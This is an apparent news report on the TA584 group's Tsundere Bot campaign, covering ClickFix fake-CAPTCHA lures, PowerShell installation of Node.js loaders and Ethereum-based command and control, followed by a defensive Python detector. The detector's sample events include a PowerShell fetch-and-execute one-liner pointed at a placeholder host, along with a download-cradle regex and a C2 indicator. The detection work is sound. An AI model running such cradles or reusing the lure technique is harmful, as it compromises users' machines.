A sophisticated cybercriminal group tracked as TA584 has added a new malware family, Tsundere Bot, to its arsenal of attack tools, delivering it through deceptive social engineering. The threat actor, tracked as an initial access broker, has significantly intensified operations throughout 2025, with campaign volumes tripling between March and December.

Through skillfully constructed phishing emails that impersonate reputable companies and government organizations, the group targets businesses all over the world and deceives victims into running harmful commands themselves. TA584 is quick and flexible, launching several campaigns at once while continuously rotating its infrastructure, delivery methods, and lures. The threat actor uses compromised accounts to send seemingly authentic emails containing unique URLs that are intended to evade security filters through IP verification and geofencing. To gain credibility with potential targets, these messages frequently pose as government agencies, business services, recruiting firms, and healthcare facilities.

According to Proofpoint analysts, Tsundere Bot is a malware-as-a-service platform that TA584 first delivered in late November 2025. Combining backdoor capabilities with sophisticated evasion techniques, the malware represents a worrying evolution in threat delivery.

Figure: Lure posing as a recruiting agency (Source: Proofpoint)

Early campaign analysis showed that infections could lead to ransomware deployment, putting enterprise networks at serious risk.
The threat actor's operational consistency since 2020, combined with connections to Russian cybercriminal markets, underscores the organized and persistent nature of these attacks.

The malware sets itself apart by using blockchain technology for command-and-control communications, taking advantage of the Ethereum network through a method known as EtherHiding. By retrieving configuration data from Web3 smart contracts, this method greatly increases the difficulty of detection and disruption for security teams. The malware is deployed by PowerShell scripts generated from its control panel, which automatically install Node.js, a prerequisite for Tsundere Bot.

ClickFix Mechanism for Social Engineering

To trick victims into running malicious PowerShell commands on their own computers, TA584 uses the ClickFix technique. After clicking the embedded URL and passing through several verification layers, recipients land on a phony CAPTCHA verification page.

Figure: CAPTCHA with an HSE theme (Source: Proofpoint)

After completing the CAPTCHA, users are shown fake error messages instructing them to copy and paste a particular command into the Windows Run dialog.

Figure: ClickFix procedure (Source: Proofpoint)

By following these instructions, victims unintentionally run a PowerShell command that downloads and launches a remote script from infrastructure under the attacker's control.

Figure: TA584 PowerShell script (Source: Proofpoint)

This intermediate script installs Node.js and its dependencies directly from legitimate sources, then decrypts two AES-encrypted Node.js files embedded within the payload. The first file acts as a loader and executes the second, which contains Tsundere Bot itself.
The infection chain incorporates multiple anti-analysis features, such as IP-based restrictions that prevent security researchers from retrieving payloads unless they request them from the same address that viewed the landing page. Once installed, Tsundere Bot connects to its command-and-control server at 193.17.183.126:3001, transmits system profiling information, and awaits further instructions. The malware's geographic restrictions, which prevent execution on systems using CIS country languages, suggest operational boundaries consistent with Russian cybercriminal conventions.
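As an added defender-side example (not Proofpoint's or the article's code), the following Python flags the three observable stages of the chain described above in constructed Sysmon-style events: a PowerShell download cradle launched from the Run dialog (parent explorer.exe), PowerShell spawning node.exe, and a connection to the C2 endpoint reported above. The event shape, field names and the lure hostname are assumptions made for the example.

```python
"""Added example: flag the ClickFix -> PowerShell -> Node.js -> C2 chain in constructed events."""
import re

# Constructed sample events in a Sysmon-like shape (id 1 = process create, id 3 = network connect).
# Field names and the lure hostname are assumptions; the C2 address is the one reported in the article.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -w hidden -c \"iex (iwr 'http://lure.example/verify' -UseBasicParsing)\""},
    {"id": 1, "image": r"C:\Users\Public\node\node.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "node.exe loader.js"},
    {"id": 3, "image": r"C:\Users\Public\node\node.exe", "dst_ip": "193.17.183.126", "dst_port": 3001},
    # Benign admin usage: PowerShell launched from cmd.exe with no download cradle.
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "powershell -File C:\\scripts\\backup.ps1"},
]

# Common PowerShell download-and-execute cmdlets and aliases seen in ClickFix one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|iex|invoke-expression)\b", re.I)
KNOWN_C2 = {("193.17.183.126", 3001)}  # C2 endpoint reported in the article


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a rule name if the event matches one stage of the chain, else None."""
    img = _basename(event.get("image", ""))
    if event["id"] == 1:
        parent = _basename(event.get("parent", ""))
        cmd = event.get("cmd", "")
        # Stage 1: Run-dialog launch (parent explorer.exe) of PowerShell with a download cradle.
        if img == "powershell.exe" and parent == "explorer.exe" and DOWNLOAD_CRADLE.search(cmd):
            return "clickfix_powershell_cradle"
        # Stage 2: PowerShell spawning Node.js, as the installer script does for Tsundere Bot.
        if img == "node.exe" and parent == "powershell.exe":
            return "powershell_spawns_node"
    elif event["id"] == 3 and (event.get("dst_ip"), event.get("dst_port")) in KNOWN_C2:
        # Stage 3: outbound connection to the reported command-and-control server.
        return "tsundere_c2_connection"
    return None


def detect(events):
    """Return a list of (event index, rule name) for every matching event."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]
```

The parent-process condition is the key discriminator: a Run-dialog paste shows explorer.exe as the parent, which a legitimately scripted PowerShell invocation rarely does.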